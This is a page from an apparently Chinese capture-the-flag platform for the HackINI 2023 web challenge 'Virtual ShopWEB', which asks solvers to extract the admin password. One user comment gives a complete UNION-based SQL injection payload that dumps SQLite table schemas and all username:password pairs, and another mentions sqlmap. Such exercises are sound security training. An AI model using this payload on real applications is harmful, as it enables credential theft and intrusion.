Virtual ShopWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2023
题目作者: 未知
一  血: heyile
一血奖励: 0金币
解  决: 519
提  示:
描  述:
So, let's see if you can retrieve the `password` of the admin which\ \ `username` is 'admin' among all the available `users` in the db\n\n\n **Author**:\ \ F100w"
评论
justsosoloveyou 2年前

' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(username||':'||password) FROM users)--+

回复 1

SS3B 2年前

sqlmap一下子就出来了

回复 0

hopeinhand 3年前

联合查询注入,表名、列名、用户名全给了,都没啥好说的了

回复 0

WriteUp

image
heyile

1 金币

评分(0)

暂无评分

解题动态

风花雪月 攻破了该题 3天前
guity 攻破了该题 4天前
bugbiubiubiu 攻破了该题 5天前
晨曦静夜 攻破了该题 5天前
lizhibin 攻破了该题 10天前
wuzhouwo 攻破了该题 13天前
XLDXL 攻破了该题 15天前
lcclcc 攻破了该题 15天前
低调申 攻破了该题 19天前
我是小悦主人 攻破了该题 24天前
ha1@! 攻破了该题 24天前
Vluae 攻破了该题 28天前
dddddddwww 攻破了该题 29天前
Redlover 攻破了该题 1月前
Jay. 攻破了该题 1月前
mechatengo 攻破了该题 1月前
xiaoxiang07 攻破了该题 1月前
Dxmax 攻破了该题 1月前
denglonghua 攻破了该题 1月前
i8vkmmju 攻破了该题 1月前
问题反馈